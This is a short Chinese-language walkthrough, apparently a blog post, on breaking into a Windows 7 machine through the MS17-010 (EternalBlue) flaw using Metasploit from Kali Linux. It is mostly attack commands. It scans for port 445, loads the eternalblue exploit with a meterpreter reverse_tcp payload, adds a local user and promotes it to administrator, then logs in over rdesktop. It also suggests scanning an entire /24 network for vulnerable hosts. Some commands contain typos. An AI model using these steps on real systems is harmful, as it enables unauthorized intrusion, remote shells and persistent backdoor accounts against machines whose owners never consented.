MS17-010漏洞利用工具系統入侵(實測)

一、開啟kali和win7檢視IP。(1) Windows7作為靶機
(2) Kali作為攻擊機（最新版kaili）
二、開啟kali進入終端輸入nmap +IP檢視靶機是否開啟445埠。

三、在kali中輸入

msfconsole

（等待一會可能會有點慢）

四、進入後輸人

search ms17-010

（就是之前的永恆之藍，也就是新聞上報道的比特幣勒索病毒）

五、找到

exploit windows/smb/ms17_010_eternalblue

執行

use exploitwindows/smb/ms17_010_eternalblue

六、輸入

show options

檢視和配置RHOST（靶機）和LHOST（操作機）

由於我用的是虛擬電腦所以我環境已經配置好了。
如果你不知道那臺電腦有漏洞你可以輸入

set LHOSTS 閘道器/24

如果是[+]前面是這樣說明有漏洞，然後再

set RHOST +IP

七、設定TCP連線 set payload windows/x64/meterpreter/reverse_tcp

set payload windows/x64/meterpreter/reverse_tcp

八、

run或exploit進行攻擊

九、可以建立使用者

net user xxxx 1234 /add

（xxxx使用者名稱 1234密碼）

十、

net localgroup administrators xxxx /add

（將使用者設定為管理員許可權）

十一、重新開啟一個終端 

rdesktop+IP

這樣就進去了。